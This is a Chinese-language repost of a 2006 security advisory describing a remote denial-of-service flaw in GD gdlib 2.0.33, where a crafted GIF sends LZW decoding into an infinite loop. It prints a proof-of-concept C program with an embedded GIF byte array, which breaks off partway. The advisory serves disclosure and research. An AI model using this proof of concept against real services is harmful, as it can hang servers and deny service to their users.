首页 > > 服务器技术 > 安全防护 >

GD图形库远程拒绝服务漏洞

2008-04-09 04:18:00来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

GD图形库远程拒绝服务漏洞

发布日期:2006-06-06
更新日期:2006-06-06

受影响系统:
GD gdlib 2.0.33
描述:
BUGTRAQ ID: 18294

GD是开放源码的代码库,用于动态创建图形。

GD库在加载GIF时LZW解码中存在漏洞。在解码特制的图形时,如用特制的GIF数据调用了gdImageCreateFromGifPtr(),就会导致死循环,消耗100%的CPU资源,造成拒绝服务。

<*来源:Xavier Roche (rocheml@httrack.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114962062927164&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* id: gdbad.c, Xavier Roche, May. 2006 */
/* gcc gdbad.c -o bad -lgd && ./bad */

#include <stdio.h>
#include <stdlib.h>
#include "gd.h"

static const unsigned char gifdata[8994];
int main(void) {
gdImagePtr im;
if ( ( im = gdImageCreateFromGifPtr(8994,
(char*) &gifdata[0]) ) != NULL) {
fprintf(stderr, "success!\n");
gdImageDestroy(im);
} else {
fprintf(stderr, "failed!\n");
}
return 0;
}

/* GIF data (image taken from
<http://www.alltooflat.com/geeky/elgoog/m/imgdb/351/intl^en^images^logo.gif>)
*/
static const unsigned char gifdata[8994] = {71,73,70,56,55,97,20,1,110,
0,247,0,0,247,247,247,255,251,255,231,231,231,214,211,214,239,235,239,
206,203,206,173,20,0,222,219,222,24,69,173,24,73,181,16,52,132,16,60,
148,198,24,0,181,178,181,247,243,247,140,16,0,198,190,189,189,186,189,
24,77,198,231,227,231,239,239,239,198,195,198,247,243,239,189,190,189,
198,199,198,8,81,8,206,207,206,8,36,99,33,89,214,214,36,8,214,215,214,
24,81,206,156,158,156,239,186,0,222,223,222,0,101,0,214,174,0,99,150,
239,49,101,214,74,125,231,8,60,165,181,182,181,156,154,156,115,162,239,
222,223,231,57,113,222,107,12,0,0,125,8,255,207,0,189,182,189,173,166,
173,165,162,165,231,73,49,41,81,181,255,117,99,189,150,0,90,138,239,165,
166,165,16,69,181,173,170,173,198,158,0,173,174,173,247,105,82,231,60,
33,253,253,253,239,89,66,99,211,99,222,48,24,90,203,90,181,36,16,132,
170,247,249,249,249,148,121,0,16,150,24,181,142,0,132,105,0,99,81,0,41,
73,148,173,134,0,189,44,24,107,44,33,49,182,57,165,130,0,173,199,247,
206,60,41,165,190,239,173,170,165,198,215,255,189,227,189,99,121,164,
107,211,115,247,134,115,255,239,8,90,105,124,140,32,16,148,65,49,132,
134,148,247,150,132,148,146,140,115,121,140,198,146,140,165,166,173,189,
207,239,206,213,214,41,65,107,132,125,115,217,215,203,234,234,234,123,
77,66,239,242,247,148,174,222,203,206,214,74,97,148,132,154,214,222,219,
214,247,251,255,123,134,173,165,134,123,23,64,154,140,146,148,57,186,66,
181,178,173,165,170,173,24,162,33,107,105,107,66,195,74,218,229,255,82,
109,173,198,199,206,156,101,90,123,101,82,73,85,115,59,89,147,123,219,
132,132,146,181,247,223,90,231,235,239,206,174,165,89,129,214,214,182,
181,165,182,214,210,210,210,247,186,173,222,227,231,57,97,181,247,166,
156,148,158,181,231,231,239,194,194,195,181,182,189,217,217,217,181,69,
49,255,247,255,247,247,255,198,117,107,214,219,231,214,219,221,225,225,
225,173,150,140,206,199,198,132,117,57,33,170,41,181,186,198,244,244,
244,156,134,66,181,195,222,255,235,231,231,228,222,206,235,206,231,219,
222,173,178,181,247,215,41,181,162,99,168,167,167,90,117,90,181,166,140,
255,203,198,115,142,206,192,191,191,239,231,231,170,146,49,247,215,206,
189,158,16,255,247,132,241,241,241,255,255,247,206,211,231,185,184,185,
181,89,74,25,57,127,222,203,140,239,199,41,13,55,146,206,195,165,214,
101,90,255,239,49,222,203,198,165,174,189,231,235,255,206,174,41,222,
186,66,12,50,133,201,201,201,255,243,181,178,177,178,181,170,165,239,
247,239,255,243,239,255,255,239,156,211,165,255,247,247,180,179,178,247,
231,214,140,203,140,239,227,148,222,239,222,165,164,163,173,142,16,239,
235,231,255,251,222,214,215,222,247,247,239,10,45,119,90,170,99,25,77,
189,140,174,140,222,215,214,162,160,160,123,150,123,146,148,154,66,142,
66,22,74,190,41,93,49,24,121,33,154,153,153,197,196,193,157,154,153,166,
163,160,215,212,209,3,26,76,11,34,87,148,147,149,42,62,109,152,155,165,
43,98,218,155,153,151,155,182,242,145,172,230,154,155,159,209,221,243,
247,235,247,133,133,139,184,181,176,24,46,97,243,244,246,255,255,255,44,
0,0,0,0,20,1,110,0,0,8,255,0,255,9,28,72,176,160,193,131,8,19,42,92,200,
176,161,195,135,16,35,74,156,72,177,162,197,139,24,51,106,220,200,177,
163,199,143,32,67,138,28,73,178,164,201,147,40,83,170,92,201,178,165,
203,151,48,99,202,156,73,179,166,205,155,56,115,234,220,201,179,167,207,

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Netquery Host参数任意命令执行漏洞

下一篇:Microsoft IE Frameset远程拒绝服务漏洞

相关文章

IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设

网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源

网站联盟: 联盟新闻 联盟介绍 联盟点评 网赚技巧

行业资讯: 搜索引擎 网络游戏 电子商务 广告传媒

网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护

软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计: Java技术 C/C++ VB delphi

网络知识: 网络协议 网络安全 网络管理 组网方案 Cisco技术

操作系统: Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条
最新资讯
热门关注
热门标签